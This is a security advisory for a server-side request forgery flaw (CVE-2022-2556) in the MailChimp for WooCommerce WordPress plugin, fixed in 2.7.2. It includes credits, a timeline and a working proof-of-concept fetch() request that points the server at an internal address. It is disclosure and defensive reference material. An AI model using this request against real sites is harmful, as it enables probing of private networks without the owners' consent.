WordPress Plugin Vulnerabilities

MailChimp for Woocommerce < 2.7.2 - Admin+ SSRF

Description

The plugin has an AJAX action that allows high privilege users to perform a POST request on behalf of the server to the internal network/LAN, the body of the request is also appended to the response so it can be used to scan private network for example

Proof of Concept

As an admin:

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "accept": "application/json, text/javascript, */*; q=0.01",
    "accept-language": "en-US,en;q=0.9",
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
    "x-requested-with": "XMLHttpRequest"
  },
  "referrerPolicy": "strict-origin-when-cross-origin",
  "body": "action=mailchimp_woocommerce_oauth_status&url=http://127.0.0.1:8181",
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
});

Affects Plugins

Plugin icon
mailchimp-for-woocommerce
Fixed in 2.7.2

References

CVE
CVE-2022-2556

Classification

Type
SSRF
OWASP top 10
A1: Injection
CWE
CWE-918
CVSS
2.7 (low)

Miscellaneous

Original Researcher
Miguel Xavier Penha Neto
Submitter
Miguel Xavier Penha Neto
Submitter website
https://www.miguelxpn.com
Submitter twitter
miguelxpn
Verified
Yes
WPVDB ID
f2a59eaa-6b44-4098-912f-823289cf33b0

Timeline

Publicly Published
2022-08-03 (about 1 years ago)
Added
2022-08-03 (about 1 years ago)
Last Updated
2023-04-12 (about 7 months ago)

Other

Published
Title
Published
2022-12-13
Title
WP <= 6.2 - Unauthenticated Blind SSRF via DNS Rebinding
Published
2023-03-02
Title
Instant Images < 5.2.0 - Author+ SSRF
Published
2023-12-04
Title
SpeedyCache < 1.1.3 - Authenticated (Subscriber+) Server-Side Request Forgery
Published
2023-05-30
Title
Download Monitor < 4.8.2 - Admin+ SSRF
Published
2023-03-08
Title
GiveWP < 2.25.2 - Admin+ Server-Side Request Forgery